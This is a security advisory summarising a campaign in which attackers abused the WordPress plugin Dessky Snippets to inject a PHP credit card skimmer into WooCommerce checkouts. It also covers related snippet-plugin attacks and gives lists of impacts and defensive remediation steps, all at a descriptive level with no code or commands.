Analysis Summary

Lesser-known code snippet plugins for WordPress are being abused by unknown threat actors to include malicious PHP code that can collect credit card data from victim websites.

Researchers discovered the campaign on May 11, 2024, and it involves the misuse of the WordPress plugin Dessky Snippets, which enables users to write custom PHP code. There are more than 200 installations in use.

These types of attacks are known to make use of WordPress plugin vulnerabilities that are well-known or readily guessable credentials to obtain administrator access and install additional plugins—legitimate or not—for post-exploitation purposes. According to researchers, a server-side PHP credit card skimmer malware is inserted into infected websites using the Dessky Snippets plugin to steal financial information.

This malicious code was intended to alter the WooCommerce checkout process by tampering with the billing form and inserting its code. It was stored in the WordPress wp_options table's dnsp_settings option. The design specifically entails adding multiple fields to the invoicing form that are intended to solicit credit card information, such as names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers. These details are subsequently exfiltrated.

One notable feature of the campaign is that the autocomplete feature has been disabled on the billing form linked to the fraudulent overlay. In addition to ensuring that the fields remain blank until the user manually fills them out, disabling this feature on the fake checkout form lowers the possibility that the browser will alert the user that sensitive information is being entered. This lowers suspicion and makes the fields appear as regular, necessary inputs for the transaction.

Threat actors have already used genuine code snippet plugins for malicious ends. This is not the first time this has happened. Researchers discovered last month that malicious JavaScript code was being injected into WordPress websites via the WPCode code snippet plugin, causing visitors to be redirected to VexTrio domains. Over 39,000 WordPress websites have been affected by a different malware campaign known as Sign1, which used malicious JavaScript injections using the Simple Custom CSS and JS plugin to divert visitors to fraudulent websites.

Owners of WordPress websites, especially those with e-commerce features, are advised to constantly check their sites for malware or unauthorized changes, use strong passwords to thwart brute-force attacks and maintain their sites and plugins up to date.

Impact

• Financial Loss
• Sensitive Data Theft
• Code Execution

Remediation

• Enhance the security of your WordPress site by implementing two-factor authentication.
• Keep your WordPress core and all installed plugins up to date.
• Conduct regular security audits of your WordPress site.
• Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets
• Maintain daily backups of all computer networks and servers.
• Keep all software, operating systems, and applications updated with the latest security patches.
• Continuously monitor network and system logs for unusual or suspicious activities.
• Review and secure website code to prevent open redirect vulnerabilities.
• Educate all site administrators about security best practices and the potential risks associated with phishing emails, fake security advisories, and malicious plugins.